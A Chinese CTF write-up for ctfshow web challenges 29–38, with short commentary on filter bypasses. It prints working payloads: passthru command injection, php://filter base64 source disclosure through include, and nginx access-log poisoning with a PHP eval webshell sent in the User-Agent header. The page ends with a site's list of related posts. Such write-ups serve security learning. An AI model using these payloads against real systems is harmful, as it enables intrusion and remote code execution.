ctfshow web入门 web29-web38

web29

把flag和i屏蔽了

system函数也行但是通常会屏蔽所以我直接用passthru

看看有啥

cat的话要查看源代码

web30

没有意外把这个system屏蔽了没事我不用哈哈哈

?c=passthru("cat f*");

然后查看源代码

web31

把空格屏蔽了

某位大佬的题解看到的

%09或者/**/绕过

但是是在""里面所以我们还是直接%09吧

web32

php伪协议,最常用的两种命令

php://filter/read=convert.base64-encode/resource=index.php
php://filter/resource=index.php

查看文件内容(源代码)

构造

?c=include$_GET["cmd"]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php

这里放两张我和大佬聊天的截图,真的很无语

加个http://

移动到最后发现有等号,base64解码

web33

双引号屏蔽了我不用就是了把刚才那个改一下

?c=include$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php

web34

怎么看着和web33的一模一样

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

可以用

base64解码

web35

说实话不认真比对真的看不出来有啥区别,这次多了一个等号

?c=include$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php

但是我抱着试一试的情况把他做出来了

web36

屏蔽了数字

但是我的payload根本就没有数字哇,继续用,都已经是套娃了家人们

?c=include$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php

得吃php伪协议

web37

日志文件包含

思路:include文件包含,利用日志文件包含

?c=/var/log/nginx/access.log   (访问日志文件

打开hackbar,

user agent传马

<?php eval($_POST['a']);?>

antsword链接

到手,之前做过日志文件包含所以我看到自己的题解找到的这个"?c=/var/log/nginx/access.log"

就是方便

web38

一样的做法,一个不用的步骤都没有,中途操作有问题的评论或者私聊帮你解决
 

相关推荐

  1. <span style='color:red;'>Web</span><span style='color:red;'>入门</span>

    Web入门

    2024-04-03 23:40:02      6 阅读

最近更新

  1. 4.15 day6 ARM

    2024-04-03 23:40:02       0 阅读
  2. pytorch 多进程数据加载 - 序列化数据/serialize_data

    2024-04-03 23:40:02       0 阅读

热门阅读

  1. sqlmap基础知识(二)

    2024-04-03 23:40:02       4 阅读
  2. 【NC201605】Bits

    2024-04-03 23:40:02       5 阅读
  3. 算法刷题记录 Day35

    2024-04-03 23:40:02       4 阅读
  4. VC++、GCC、CLANG,INT128有符号整数编译器关键字

    2024-04-03 23:40:02       4 阅读
  5. Python 抽象类

    2024-04-03 23:40:02       7 阅读
  6. 第六章:使用 kubectl 创建 Deployment

    2024-04-03 23:40:02       4 阅读
  7. vue3 + howuse, 实现echarts symbol使用 gif 动画图片

    2024-04-03 23:40:02       5 阅读
  8. 初识人工智能---------自然语言处理&&词袋模型

    2024-04-03 23:40:02       6 阅读
  9. MySQL学习笔记(持续更行ing)

    2024-04-03 23:40:02       8 阅读
  10. C++从入门到精通——nullptr

    2024-04-03 23:40:02       6 阅读
  11. 大厂HashMap源码面试

    2024-04-03 23:40:02       5 阅读
  12. Linux进程状态

    2024-04-03 23:40:02       4 阅读